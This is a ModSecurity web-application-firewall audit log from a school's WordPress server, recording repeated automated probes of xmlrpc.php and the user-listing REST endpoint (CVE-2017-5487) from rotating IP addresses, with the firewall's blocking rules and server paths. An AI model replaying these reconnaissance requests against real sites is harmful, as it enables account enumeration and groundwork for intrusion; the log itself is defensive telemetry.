Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d74ac949-Z-- --9dfce56a-A-- [17/May/2025:03:06:26 +0700] aCeawthEtho3ciA0weheYgAAAIc 103.236.140.4 54618 103.236.140.4 8181 --9dfce56a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.58 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9dfce56a-C-- demo.sayHello --9dfce56a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9dfce56a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425986728213 4450 (- - -) Stopwatch2: 1747425986728213 4450; combined=3440, p1=411, p2=2825, p3=26, p4=31, p5=86, sr=67, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9dfce56a-Z-- --d30ffc22-A-- [17/May/2025:03:06:32 +0700] aCeayNhEtho3ciA0weheZQAAAIs 103.236.140.4 54624 103.236.140.4 8181 --d30ffc22-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.203 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d30ffc22-C-- demo.sayHello --d30ffc22-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d30ffc22-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425992938538 6655 (- - -) Stopwatch2: 1747425992938538 6655; combined=4701, p1=585, p2=3863, p3=37, p4=42, p5=102, sr=77, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d30ffc22-Z-- --bb637165-A-- [17/May/2025:03:06:42 +0700] aCea0thEtho3ciA0weheZwAAAI8 103.236.140.4 54628 103.236.140.4 8181 --bb637165-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.39 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bb637165-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb637165-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426002966445 2765 (- - -) Stopwatch2: 1747426002966445 2765; combined=1272, p1=424, p2=818, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb637165-Z-- --4603fe17-A-- [17/May/2025:03:06:48 +0700] aCea2NhEtho3ciA0weheaQAAAIw 103.236.140.4 54632 103.236.140.4 8181 --4603fe17-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.39 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4603fe17-C-- demo.sayHello --4603fe17-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4603fe17-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426008041372 4709 (- - -) Stopwatch2: 1747426008041372 4709; combined=3693, p1=428, p2=3053, p3=29, p4=32, p5=89, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4603fe17-Z-- --9c067e3d-A-- [17/May/2025:03:06:58 +0700] aCea4thEtho3ciA0weheawAAAIE 103.236.140.4 54636 103.236.140.4 8181 --9c067e3d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9c067e3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c067e3d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426018386478 2370 (- - -) Stopwatch2: 1747426018386478 2370; combined=1160, p1=361, p2=770, p3=0, p4=0, p5=29, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c067e3d-Z-- --da15de2f-A-- [17/May/2025:03:07:03 +0700] aCea59hEtho3ciA0wehebAAAAI0 103.236.140.4 54640 103.236.140.4 8181 --da15de2f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.98 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --da15de2f-C-- demo.sayHello --da15de2f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --da15de2f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426023968346 6042 (- - -) Stopwatch2: 1747426023968346 6042; combined=4387, p1=526, p2=3627, p3=31, p4=37, p5=98, sr=74, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da15de2f-Z-- --a792983a-A-- [17/May/2025:03:07:27 +0700] aCea_9hEtho3ciA0wehebwAAAJg 103.236.140.4 54646 103.236.140.4 8181 --a792983a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a792983a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a792983a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426047262055 3263 (- - -) Stopwatch2: 1747426047262055 3263; combined=1420, p1=508, p2=878, p3=0, p4=0, p5=34, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a792983a-Z-- --3876a45b-A-- [17/May/2025:03:07:33 +0700] aCebBdhEtho3ciA0wehecQAAAIM 103.236.140.4 54650 103.236.140.4 8181 --3876a45b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.174 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3876a45b-C-- demo.sayHello --3876a45b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3876a45b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426053096967 4536 (- - -) Stopwatch2: 1747426053096967 4536; combined=3561, p1=446, p2=2915, p3=23, p4=26, p5=90, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3876a45b-Z-- --1639506d-A-- [17/May/2025:03:07:49 +0700] aCebFde6THFz1hsaJaLZQgAAAAU 103.236.140.4 54666 103.236.140.4 8181 --1639506d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.251 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1639506d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1639506d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426069458935 3247 (- - -) Stopwatch2: 1747426069458935 3247; combined=1417, p1=504, p2=881, p3=0, p4=0, p5=32, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1639506d-Z-- --90b6253c-A-- [17/May/2025:03:07:55 +0700] aCebG9hEtho3ciA0wehedAAAAIk 103.236.140.4 54672 103.236.140.4 8181 --90b6253c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.251 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --90b6253c-C-- demo.sayHello --90b6253c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --90b6253c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426075467498 4765 (- - -) Stopwatch2: 1747426075467498 4765; combined=3673, p1=418, p2=3045, p3=29, p4=24, p5=91, sr=65, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90b6253c-Z-- --40657a3b-A-- [17/May/2025:03:08:07 +0700] aCebJ9e6THFz1hsaJaLZQwAAAA4 103.236.140.4 54696 103.236.140.4 8181 --40657a3b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.32 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --40657a3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40657a3b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426087453571 3556 (- - -) Stopwatch2: 1747426087453571 3556; combined=1448, p1=503, p2=912, p3=0, p4=0, p5=32, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40657a3b-Z-- --6701ef05-A-- [17/May/2025:03:08:08 +0700] aCebKNhEtho3ciA0wehedgAAAI4 103.236.140.4 54698 103.236.140.4 8181 --6701ef05-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6701ef05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6701ef05-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426088993211 2513 (- - -) Stopwatch2: 1747426088993211 2513; combined=1138, p1=387, p2=722, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6701ef05-Z-- --0eb29052-A-- [17/May/2025:03:08:13 +0700] aCebLce47ocjCGWTS4Y_GwAAAFE 103.236.140.4 54704 103.236.140.4 8181 --0eb29052-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.32 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0eb29052-C-- demo.sayHello --0eb29052-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0eb29052-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426093752742 4596 (- - -) Stopwatch2: 1747426093752742 4596; combined=3606, p1=431, p2=2976, p3=23, p4=27, p5=88, sr=67, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0eb29052-Z-- --3fe14f49-A-- [17/May/2025:03:08:14 +0700] aCebLse47ocjCGWTS4Y_HAAAAEM 103.236.140.4 54706 103.236.140.4 8181 --3fe14f49-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3fe14f49-C-- demo.sayHello --3fe14f49-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fe14f49-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426094071094 4573 (- - -) Stopwatch2: 1747426094071094 4573; combined=3652, p1=444, p2=2993, p3=22, p4=25, p5=98, sr=93, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fe14f49-Z-- --e5d8ba56-A-- [17/May/2025:03:08:15 +0700] aCebL9e6THFz1hsaJaLZRAAAAAY 103.236.140.4 54708 103.236.140.4 8181 --e5d8ba56-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e5d8ba56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5d8ba56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426095345924 2686 (- - -) Stopwatch2: 1747426095345924 2686; combined=1212, p1=450, p2=733, p3=0, p4=0, p5=29, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5d8ba56-Z-- --818fe848-A-- [17/May/2025:03:08:21 +0700] aCebNce47ocjCGWTS4Y_HwAAAFU 103.236.140.4 54716 103.236.140.4 8181 --818fe848-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.154 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --818fe848-C-- demo.sayHello --818fe848-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --818fe848-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426101199765 6671 (- - -) Stopwatch2: 1747426101199765 6671; combined=4720, p1=619, p2=3847, p3=41, p4=42, p5=101, sr=79, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --818fe848-Z-- --3909e953-A-- [17/May/2025:03:08:22 +0700] aCebNse47ocjCGWTS4Y_IAAAAFY 103.236.140.4 54718 103.236.140.4 8181 --3909e953-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3909e953-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3909e953-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s 